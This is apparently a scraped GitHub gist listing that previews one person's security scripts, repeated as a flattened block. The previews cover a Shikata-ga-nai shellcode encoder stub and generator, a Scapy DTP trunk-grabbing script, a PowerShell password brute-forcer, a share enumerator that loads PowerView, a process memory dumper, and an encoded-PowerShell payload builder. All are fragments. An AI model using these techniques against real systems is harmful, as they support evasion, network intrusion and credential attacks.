Frank Spierings FrankSpierings

## Shikata-ga-nai_x86.py
#
#                                      _payload:
# 00002014 B8DAFFFECD                      mov        eax, 0xcdfeffda             ; Move the initialisation vector (IV) into EAX. This is the initial key, XREF=_main+13
# 00002019 DAD3                            fcmovbe    st0, st3                    ; (Not sure) Conditional move ST0 to ST3 (floating point). Not sure why this is necessary
# 0000201b D97424F4                        fnstenv    dword [ss:esp-0xc]          ; Places the floating point memory into designated location in memory. This includes EIP. Note the offset to ESP (Stack Pointer). This makes sure that ESP will point to stored EIP.
# 0000201f 5B                              pop        ebx                         ; Get EIP from the stack. This was saved by FSTENV
# 00002020 29C9                            sub        ecx, ecx                    ; Zero out ECX
# 00002022 B10E                            mov        cl, 0xe                     ; ECX is loop counter
#

## shikata-ga-nai_x64.py
# Nasm code for the stub.
# ________
#
# global start
#
#
# section .text
#
# start:
# 	mov     rax, 0x0123456789ABCDEF  ; set the key.

## shikata-ga-nai_x64.asm
; nasm -f macho64 test.asm -o test.o \
; && ld -o test -segprot __DATA rwx rwx test.o

global start

section .text

start:
	mov     rax, 0x0123456789ABCDEF  ; Set the initial key (IV)
	lea     rbx, [rel $]             ; Place current instruction pointer RIP in RBX

## shikata-ga-nai2.py
import random
import struct
import re
import ctypes

class ShellcodeGenerator:
    __QWORD_SIZE = 8

    __iv      = 0x0000000000000000
    __payload = ""

## scapy-grab-trunk-OSX.py
from scapy.all import *
from scapy.contrib.dtp import *

FLAG_TRUNK = 0x80
RETRY      = 10
SEND_WAIT  = 5

iface = 'en0'
dtpmac = "01:00:0c:cc:cc:cc"
mymac = get_if_hwaddr(iface)

## brute.ps1
$charset  = @()
$charset += ([char]'0'..[char]'9') |% {[char]$_}
$charset += ([char]'a'..[char]'z') |% {[char]$_}
$charset += ([char]'A'..[char]'Z') |% {[char]$_}
$charset  = $charset | Select-Object -uniq

function Get-NextPassword() {
    param(
        $Password
    )

## FindShares.ps1
$host_filter  = '^C|^T'
$share_filter = 'IPC$'
$depends_url  = "https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1"
$logfile      = "foundshares.log"
$serialobj    = $("{0}.xml" -f $logfile)

$DebugPreference = "Continue"
#$DebugPreference = "SilentlyContinue"

#Import dependency

## procdump.py
#! /usr/bin/env python
#
# Modification from:
# https://unix.stackexchange.com/questions/6267/how-to-re-load-all-running-applications-from-swap-space-into-ram/6271
#
# For non-root check 'cat /proc/sys/kernel/yama/ptrace_scope' = 0
# Reference: https://www.kernel.org/doc/Documentation/security/Yama.txt
#
import re
import sys

## GenerateEncodedCommand.ps1
$DebugPreference = "Continue"
function Create-Base64Payload()
{
    param(
        $Filename
    )
    $content = (Get-Content -Path $Filename | Out-String)
    $command = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($content))
    Write-Debug "[+] Mind the newlines!"
    Write-Debug "[+] Powershell.exe -EncodedCommand $command"

## ECDiffieHellmanP256.ps1
[System.Security.Cryptography.CngKey]$aliceKey = [System.Security.Cryptography.CngKey]::Create([System.Security.Cryptography.CngAlgorithm]::ECDiffieHellmanP256)
[System.Security.Cryptography.CngKey]$bobKey   = [System.Security.Cryptography.CngKey]::Create([System.Security.Cryptography.CngAlgorithm]::ECDiffieHellmanP256)
[Byte[]]$alicePubKeyBlob = $aliceKey.Export([System.Security.Cryptography.CngKeyBlobFormat]::EccPublicBlob)
[Byte[]]$bobPubKeyBlob   = $bobKey.Export([System.Security.Cryptography.CngKeyBlobFormat]::EccPublicBlob)

[System.Security.Cryptography.ECDiffieHellmanCng]$aliceAlgorithm = New-Object System.Security.Cryptography.ECDiffieHellmanCng($aliceKey)
[System.Security.Cryptography.CngKey]$bobPubKey = [System.Security.Cryptography.CngKey]::Import($bobPubKeyBlob, [System.Security.Cryptography.CngKeyBlobFormat]::EccPublicBlob)
[Byte[]]$aliceSymKey = $aliceAlgorithm.DeriveKeyMaterial($bobPubKey)
	#
	# _payload:
	# 00002014 B8DAFFFECD mov eax, 0xcdfeffda ; Move the initialisation vector (IV) into EAX. This is the initial key, XREF=_main+13
	# 00002019 DAD3 fcmovbe st0, st3 ; (Not sure) Conditional move ST0 to ST3 (floating point). Not sure why this is necessary
	# 0000201b D97424F4 fnstenv dword [ss:esp-0xc] ; Places the floating point memory into designated location in memory. This includes EIP. Note the offset to ESP (Stack Pointer). This makes sure that ESP will point to stored EIP.
	# 0000201f 5B pop ebx ; Get EIP from the stack. This was saved by FSTENV
	# 00002020 29C9 sub ecx, ecx ; Zero out ECX
	# 00002022 B10E mov cl, 0xe ; ECX is loop counter
	#
	# Nasm code for the stub.
	# ________
	#
	# global start
	#
	#
	# section .text
	#
	# start:
	# mov rax, 0x0123456789ABCDEF ; set the key.
	; nasm -f macho64 test.asm -o test.o \
	; && ld -o test -segprot __DATA rwx rwx test.o

	global start

	section .text

	start:
	mov rax, 0x0123456789ABCDEF ; Set the initial key (IV)
	lea rbx, [rel $] ; Place current instruction pointer RIP in RBX
	import random
	import struct
	import re
	import ctypes

	class ShellcodeGenerator:
	__QWORD_SIZE = 8

	__iv = 0x0000000000000000
	__payload = ""
	from scapy.all import *
	from scapy.contrib.dtp import *

	FLAG_TRUNK = 0x80
	RETRY = 10
	SEND_WAIT = 5

	iface = 'en0'
	dtpmac = "01:00:0c:cc:cc:cc"
	mymac = get_if_hwaddr(iface)
	$charset = @()
	$charset += ([char]'0'..[char]'9') \|% {[char]$_}
	$charset += ([char]'a'..[char]'z') \|% {[char]$_}
	$charset += ([char]'A'..[char]'Z') \|% {[char]$_}
	$charset = $charset \| Select-Object -uniq

	function Get-NextPassword() {
	param(
	$Password
	)
	$host_filter = '^C\|^T'
	$share_filter = 'IPC$'
	$depends_url = "https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1"
	$logfile = "foundshares.log"
	$serialobj = $("{0}.xml" -f $logfile)

	$DebugPreference = "Continue"
	#$DebugPreference = "SilentlyContinue"

	#Import dependency
	#! /usr/bin/env python
	#
	# Modification from:
	# https://unix.stackexchange.com/questions/6267/how-to-re-load-all-running-applications-from-swap-space-into-ram/6271
	#
	# For non-root check 'cat /proc/sys/kernel/yama/ptrace_scope' = 0
	# Reference: https://www.kernel.org/doc/Documentation/security/Yama.txt
	#
	import re
	import sys
	$DebugPreference = "Continue"
	function Create-Base64Payload()
	{
	param(
	$Filename
	)
	$content = (Get-Content -Path $Filename \| Out-String)
	$command = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($content))
	Write-Debug "[+] Mind the newlines!"
	Write-Debug "[+] Powershell.exe -EncodedCommand $command"
	[System.Security.Cryptography.CngKey]$aliceKey = [System.Security.Cryptography.CngKey]::Create([System.Security.Cryptography.CngAlgorithm]::ECDiffieHellmanP256)
	[System.Security.Cryptography.CngKey]$bobKey = [System.Security.Cryptography.CngKey]::Create([System.Security.Cryptography.CngAlgorithm]::ECDiffieHellmanP256)
	[Byte[]]$alicePubKeyBlob = $aliceKey.Export([System.Security.Cryptography.CngKeyBlobFormat]::EccPublicBlob)
	[Byte[]]$bobPubKeyBlob = $bobKey.Export([System.Security.Cryptography.CngKeyBlobFormat]::EccPublicBlob)

	[System.Security.Cryptography.ECDiffieHellmanCng]$aliceAlgorithm = New-Object System.Security.Cryptography.ECDiffieHellmanCng($aliceKey)
	[System.Security.Cryptography.CngKey]$bobPubKey = [System.Security.Cryptography.CngKey]::Import($bobPubKeyBlob, [System.Security.Cryptography.CngKeyBlobFormat]::EccPublicBlob)
	[Byte[]]$aliceSymKey = $aliceAlgorithm.DeriveKeyMaterial($bobPubKey)